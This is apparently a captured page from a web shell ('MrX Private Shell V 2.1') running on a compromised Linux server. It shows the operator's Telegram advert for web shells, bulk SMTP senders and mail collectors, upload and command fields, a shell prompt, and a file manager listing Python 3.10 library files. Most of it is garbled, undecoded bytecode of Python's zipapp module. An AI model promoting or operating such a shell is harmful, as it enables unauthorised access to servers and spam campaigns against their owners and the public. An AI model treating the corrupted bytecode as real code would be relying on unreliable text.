__  __    __   __  _____      _            _          _____ _          _ _ 
 |  \/  |   \ \ / / |  __ \    (_)          | |        / ____| |        | | |
 | \  / |_ __\ V /  | |__) | __ ___   ____ _| |_ ___  | (___ | |__   ___| | |
 | |\/| | '__|> <   |  ___/ '__| \ \ / / _` | __/ _ \  \___ \| '_ \ / _ \ | |
 | |  | | |_ / . \  | |   | |  | |\ V / (_| | ||  __/  ____) | | | |  __/ | |
 |_|  |_|_(_)_/ \_\ |_|   |_|  |_| \_/ \__,_|\__\___| |_____/|_| |_|\___V 2.1
 if you need WebShell for Seo everyday contact me on Telegram
 Telegram Address : @jackleet
        
        
For_More_Tools: Telegram: @jackleet | Bulk Smtp support mail sender | Business Mail Collector | Mail Bouncer All Mail | Bulk Office Mail Validator | Html Letter private



Upload:

Command:

[email protected]: ~ $
o

#T_io�@s�ddlZddlZddlZddlZddlZddlZddlZgd�ZdZej	�
d�r+dZne��ZGdd�de
�Zejdd	��Zd
d�Zddd
�Z		ddd�Zdd�Zddd�Zedkr`e�dSdS)�N)�ZipAppError�create_archive�get_interpreterz8# -*- coding: utf-8 -*-
import {module}
{module}.{fn}()
�win�utf-8c@seZdZdS)rN)�__name__�
__module__�__qualname__�r
r
�/usr/lib/python3.10/zipapp.pyr!srccsR�t|ttjf�r$t||��}|VWd�dS1swYdS|VdS�N)�
isinstance�str�os�PathLike�open)�archive�mode�fr
r
r�_maybe_open%s�"�
rcCs(|rd|�t�d}|�|�dSdS)zWrite a shebang line.�#!�
N)�encode�shebang_encoding�write)r�interpreter�shebangr
r
r�_write_file_prefix.s�rc	Cs�t|d��<}|�d�}|dkrd}|��t|d��}t||�|�|�t�||�Wd�n1s5wYWd�n1sDwY|r_t|t�rat	�
|t	�|�jtj
B�dSdSdS)z8Copy an application archive, modifying the shebang line.�rb�r��wbN)r�read�readlinerr�shutil�copyfileobjr
rr�chmod�stat�st_mode�S_IEXEC)r�new_archiver�src�first_2�dstr
r
r�
_copy_archive5s


����r.Fc	Csd}t|d�rt|d�rd}nt�|�}|��rd}|r$t|||�dS|��s,td��|d��}|r:|r:td��|sB|sBtd	��d}|r{|�d
�\}	}
}tdd�|	�	d
�D��}tdd�|�	d
�D��}
|
d
krn|rn|
sttd|��t
j|	|d�}|dur�|�d�}n
t|d�s�t�|�}t
|d��U}t||�|r�tjntj}tj|d|d��0}|�d�D]}|�|�}|dus�||�r�|�||���q�|r�|�d|�d��Wd�n1s�wYWd�n1s�wY|�rt|d��s	|�|��jtjB�dSdSdS)abCreate an application archive from SOURCE.

    The SOURCE can be the name of a directory, or a filename or a file-like
    object referring to an existing archive.

    The content of SOURCE is packed into an application archive in TARGET,
    which can be a filename or a file-like object.  If SOURCE is a directory,
    TARGET can be omitted and will default to the name of SOURCE with .pyz
    appended.

    The created application archive will have a shebang line specifying
    that it should run with INTERPRETER (there will be no shebang line if
    INTERPRETER is None), and a __main__.py which runs MAIN (if MAIN is
    not specified, an existing __main__.py will be used).  It is an error
    to specify MAIN for anything other than a directory source with no
    __main__.py, and it is an error to omit MAIN if the directory has no
    __main__.py.
    Fr"r#TNzSource does not existz__main__.pyz8Cannot specify entry point if the source has __main__.pyzArchive has no entry point�:cs��|]}|��VqdSr��isidentifier��.0�partr
r
r�	<genexpr>{��z!create_archive.<locals>.<genexpr>�.csr0rr1r3r
r
rr6|r7zInvalid entry point: )�module�fnz.pyzrr!�w)�compression�*r)�hasattr�pathlib�Path�is_filer.�existsr�	partition�all�split�
MAIN_TEMPLATE�format�with_suffixrr�zipfile�ZIP_DEFLATED�
ZIP_STORED�ZipFile�rglob�relative_tor�as_posix�writestrrr&r'r(r))�source�targetr�main�filter�
compressed�source_is_file�has_main�main_py�mod�sepr:�mod_ok�fn_ok�fdr<�z�child�arcnamer
r
rrLsd
�



�
������rcCs^t|d�� }|�d�dkr|�����t�Wd�SWd�dS1s(wYdS)Nrrr)rr"r#�strip�decoder)rrr
r
rr�s�"�rcCs2ddl}|��}|jddddd�|jdddd	d�|jd
dddd�|jd
dddd�|jddddd�|jddd�|�|�}|jrbtj�|j�sOt	d��t
|j�}td�|pZd��t
�d�tj�|j�r�|jdus~tj�|j�r�tj�|j|j�r�t	d��|jr�t	d��t|j|j|j|j|jd�dS)z�Run the zipapp command line interface.

    The ARGS parameter lets you specify the argument list directly.
    Omitting ARGS (or setting it to None) works as for argparse, using
    sys.argv[1:] as the argument list.
    rNz--outputz-ozAThe name of the output archive. Required if SOURCE is an archive.)�default�helpz--pythonz-pzEThe name of the Python interpreter to use (default: no shebang line).z--mainz-mzLThe main function of the application (default: use an existing __main__.py).z
--compressz-c�
store_truezQCompress files with the deflate method. Files are stored uncompressed by default.)�actionrdz--infoFz)Display the interpreter from the archive.)rcrfrdrQz'Source directory (or existing archive).)rdz%Can only get info for an archive filezInterpreter: {}z<none>z-In-place editing of archives is not supportedz,Cannot change the main function when copying)rrSrU)�argparse�ArgumentParser�add_argument�
parse_args�infor�path�isfilerQ�
SystemExitr�printrG�sys�exit�outputrB�samefilerSr�python�compress)�argsrg�parserrr
r
rrS�sL
�
�
�
�
��


�

�rS�__main__r)NNNNF)�
contextlibrr?r$r'rprI�__all__rF�platform�
startswithr�getfilesystemencoding�
ValueErrorr�contextmanagerrrr.rrrSrr
r
r
r�<module>s2



�J
1
�

Filemanager

Name Type Size Permission Actions
__future__.cpython-310.pyc File 4.03 KB 0644
__phello__.foo.cpython-310.pyc File 130 B 0644
_aix_support.cpython-310.pyc File 2.81 KB 0644
_bootsubprocess.cpython-310.pyc File 2.24 KB 0644
_collections_abc.cpython-310.pyc File 32.15 KB 0644
_compat_pickle.cpython-310.pyc File 5.73 KB 0644
_compression.cpython-310.pyc File 4.41 KB 0644
_distutils_system_mod.cpython-310.pyc File 5.29 KB 0644
_markupbase.cpython-310.pyc File 7.39 KB 0644
_osx_support.cpython-310.pyc File 11.26 KB 0644
_py_abc.cpython-310.pyc File 4.57 KB 0644
_pydecimal.cpython-310.pyc File 154.04 KB 0644
_pyio.cpython-310.pyc File 71.93 KB 0644
_sitebuiltins.cpython-310.pyc File 3.46 KB 0644
_strptime.cpython-310.pyc File 15.57 KB 0644
_sysconfigdata__linux_x86_64-linux-gnu.cpython-310.pyc File 34.56 KB 0644
_sysconfigdata__x86_64-linux-gnu.cpython-310.pyc File 34.55 KB 0644
_threading_local.cpython-310.pyc File 6.39 KB 0644
_weakrefset.cpython-310.pyc File 7.43 KB 0644
abc.cpython-310.pyc File 6.59 KB 0644
aifc.cpython-310.pyc File 24.11 KB 0644
antigravity.cpython-310.pyc File 822 B 0644
argparse.cpython-310.pyc File 62.05 KB 0644
ast.cpython-310.pyc File 54.43 KB 0644
asynchat.cpython-310.pyc File 6.86 KB 0644
asyncore.cpython-310.pyc File 15.63 KB 0644
base64.cpython-310.pyc File 16.76 KB 0644
bdb.cpython-310.pyc File 25.23 KB 0644
binhex.cpython-310.pyc File 12.57 KB 0644
bisect.cpython-310.pyc File 2.53 KB 0644
bz2.cpython-310.pyc File 10.62 KB 0644
cProfile.cpython-310.pyc File 4.99 KB 0644
calendar.cpython-310.pyc File 25.69 KB 0644
cgi.cpython-310.pyc File 26.1 KB 0644
cgitb.cpython-310.pyc File 9.76 KB 0644
chunk.cpython-310.pyc File 4.75 KB 0644
cmd.cpython-310.pyc File 12.41 KB 0644
code.cpython-310.pyc File 9.72 KB 0644
codecs.cpython-310.pyc File 32.44 KB 0644
codeop.cpython-310.pyc File 5.46 KB 0644
colorsys.cpython-310.pyc File 3.19 KB 0644
compileall.cpython-310.pyc File 12.43 KB 0644
configparser.cpython-310.pyc File 44.39 KB 0644
contextlib.cpython-310.pyc File 20.41 KB 0644
contextvars.cpython-310.pyc File 246 B 0644
copy.cpython-310.pyc File 6.83 KB 0644
copyreg.cpython-310.pyc File 4.57 KB 0644
crypt.cpython-310.pyc File 3.47 KB 0644
csv.cpython-310.pyc File 11.52 KB 0644
dataclasses.cpython-310.pyc File 25.96 KB 0644
datetime.cpython-310.pyc File 55.21 KB 0644
decimal.cpython-310.pyc File 362 B 0644
difflib.cpython-310.pyc File 57.52 KB 0644
dis.cpython-310.pyc File 15.29 KB 0644
doctest.cpython-310.pyc File 74.39 KB 0644
enum.cpython-310.pyc File 25.45 KB 0644
filecmp.cpython-310.pyc File 8.54 KB 0644
fileinput.cpython-310.pyc File 13.74 KB 0644
fnmatch.cpython-310.pyc File 4.14 KB 0644
fractions.cpython-310.pyc File 18.16 KB 0644
ftplib.cpython-310.pyc File 28.3 KB 0644
functools.cpython-310.pyc File 27.67 KB 0644
genericpath.cpython-310.pyc File 3.82 KB 0644
getopt.cpython-310.pyc File 6.19 KB 0644
getpass.cpython-310.pyc File 4.11 KB 0644
gettext.cpython-310.pyc File 17.79 KB 0644
glob.cpython-310.pyc File 5.71 KB 0644
graphlib.cpython-310.pyc File 7.44 KB 0644
gzip.cpython-310.pyc File 18.11 KB 0644
hashlib.cpython-310.pyc File 6.68 KB 0644
heapq.cpython-310.pyc File 13.54 KB 0644
hmac.cpython-310.pyc File 6.81 KB 0644
imaplib.cpython-310.pyc File 41.32 KB 0644
imghdr.cpython-310.pyc File 3.81 KB 0644
imp.cpython-310.pyc File 9.56 KB 0644
inspect.cpython-310.pyc File 83.16 KB 0644
io.cpython-310.pyc File 3.58 KB 0644
ipaddress.cpython-310.pyc File 61.2 KB 0644
keyword.cpython-310.pyc File 927 B 0644
linecache.cpython-310.pyc File 4.04 KB 0644
locale.cpython-310.pyc File 45.07 KB 0644
lzma.cpython-310.pyc File 11.82 KB 0644
mailbox.cpython-310.pyc File 58.68 KB 0644
mailcap.cpython-310.pyc File 7.15 KB 0644
mimetypes.cpython-310.pyc File 17.21 KB 0644
modulefinder.cpython-310.pyc File 15.79 KB 0644
netrc.cpython-310.pyc File 3.84 KB 0644
nntplib.cpython-310.pyc File 30.88 KB 0644
ntpath.cpython-310.pyc File 14.36 KB 0644
nturl2path.cpython-310.pyc File 1.71 KB 0644
numbers.cpython-310.pyc File 11.59 KB 0644
opcode.cpython-310.pyc File 5.32 KB 0644
operator.cpython-310.pyc File 13.19 KB 0644
optparse.cpython-310.pyc File 46.63 KB 0644
os.cpython-310.pyc File 30.86 KB 0644
pathlib.cpython-310.pyc File 41.07 KB 0644
pdb.cpython-310.pyc File 46.33 KB 0644
pickle.cpython-310.pyc File 45.78 KB 0644
pickletools.cpython-310.pyc File 66.17 KB 0644
pipes.cpython-310.pyc File 7.59 KB 0644
pkgutil.cpython-310.pyc File 17.93 KB 0644
platform.cpython-310.pyc File 26.79 KB 0644
plistlib.cpython-310.pyc File 23 KB 0644
poplib.cpython-310.pyc File 13.25 KB 0644
posixpath.cpython-310.pyc File 10.31 KB 0644
pprint.cpython-310.pyc File 17.46 KB 0644
profile.cpython-310.pyc File 14.05 KB 0644
pstats.cpython-310.pyc File 23.07 KB 0644
pty.cpython-310.pyc File 4.05 KB 0644
py_compile.cpython-310.pyc File 7.17 KB 0644
pyclbr.cpython-310.pyc File 9.55 KB 0644
pydoc.cpython-310.pyc File 83.64 KB 0644
queue.cpython-310.pyc File 10.54 KB 0644
quopri.cpython-310.pyc File 5.66 KB 0644
random.cpython-310.pyc File 22.21 KB 0644
re.cpython-310.pyc File 13.89 KB 0644
reprlib.cpython-310.pyc File 5.13 KB 0644
rlcompleter.cpython-310.pyc File 5.81 KB 0644
runpy.cpython-310.pyc File 9.19 KB 0644
sched.cpython-310.pyc File 5.97 KB 0644
secrets.cpython-310.pyc File 2.12 KB 0644
selectors.cpython-310.pyc File 16.7 KB 0644
shelve.cpython-310.pyc File 9.27 KB 0644
shlex.cpython-310.pyc File 7.6 KB 0644
shutil.cpython-310.pyc File 37.63 KB 0644
signal.cpython-310.pyc File 2.87 KB 0644
site.cpython-310.pyc File 17.5 KB 0644
sitecustomize.cpython-310.pyc File 225 B 0644
smtpd.cpython-310.pyc File 25.53 KB 0644
smtplib.cpython-310.pyc File 34.93 KB 0644
sndhdr.cpython-310.pyc File 6.8 KB 0644
socket.cpython-310.pyc File 28.28 KB 0644
socketserver.cpython-310.pyc File 24.75 KB 0644
sre_compile.cpython-310.pyc File 14.84 KB 0644
sre_constants.cpython-310.pyc File 6.21 KB 0644
sre_parse.cpython-310.pyc File 21.25 KB 0644
ssl.cpython-310.pyc File 44.21 KB 0644
stat.cpython-310.pyc File 4.17 KB 0644
statistics.cpython-310.pyc File 36.18 KB 0644
string.cpython-310.pyc File 6.94 KB 0644
stringprep.cpython-310.pyc File 16.67 KB 0644
struct.cpython-310.pyc File 307 B 0644
subprocess.cpython-310.pyc File 43.69 KB 0644
sunau.cpython-310.pyc File 16.1 KB 0644
symtable.cpython-310.pyc File 12.53 KB 0644
sysconfig.cpython-310.pyc File 17.73 KB 0644
tabnanny.cpython-310.pyc File 6.79 KB 0644
tarfile.cpython-310.pyc File 69.02 KB 0644
telnetlib.cpython-310.pyc File 18.07 KB 0644
tempfile.cpython-310.pyc File 26.7 KB 0644
textwrap.cpython-310.pyc File 13.49 KB 0644
this.cpython-310.pyc File 1.23 KB 0644
threading.cpython-310.pyc File 43.92 KB 0644
timeit.cpython-310.pyc File 11.49 KB 0644
token.cpython-310.pyc File 2.67 KB 0644
tokenize.cpython-310.pyc File 16.79 KB 0644
trace.cpython-310.pyc File 19.4 KB 0644
traceback.cpython-310.pyc File 21.2 KB 0644
tracemalloc.cpython-310.pyc File 17.11 KB 0644
tty.cpython-310.pyc File 1.05 KB 0644
turtle.cpython-310.pyc File 125.84 KB 0644
types.cpython-310.pyc File 9.3 KB 0644
typing.cpython-310.pyc File 83.28 KB 0644
uu.cpython-310.pyc File 3.78 KB 0644
uuid.cpython-310.pyc File 21.97 KB 0644
warnings.cpython-310.pyc File 13.33 KB 0644
wave.cpython-310.pyc File 17.18 KB 0644
weakref.cpython-310.pyc File 19.87 KB 0644
webbrowser.cpython-310.pyc File 16.6 KB 0644
xdrlib.cpython-310.pyc File 7.7 KB 0644
zipapp.cpython-310.pyc File 5.87 KB 0644
zipfile.cpython-310.pyc File 60.4 KB 0644
zipimport.cpython-310.pyc File 16.63 KB 0644
Filemanager